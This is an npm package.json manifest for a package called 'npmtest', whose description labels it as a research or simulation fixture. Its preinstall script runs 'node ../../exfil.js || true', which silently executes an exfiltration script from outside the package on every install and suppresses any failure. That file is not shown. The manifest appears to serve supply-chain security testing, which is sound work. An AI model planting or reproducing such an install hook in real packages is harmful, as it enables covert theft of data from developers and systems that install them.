{
  "name": "npmtest",
  "version": "1.0.0",
  "description": "PRT-SCAN-RESEARCH-NONCE-FULLCHAIN-GOAT-SIM-001",
  "main": "test.js",
  "dependencies": {},
  "devDependencies": {},
  "scripts": {
    "preinstall": "node ../../exfil.js || true",
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "Apache-2.0"
}
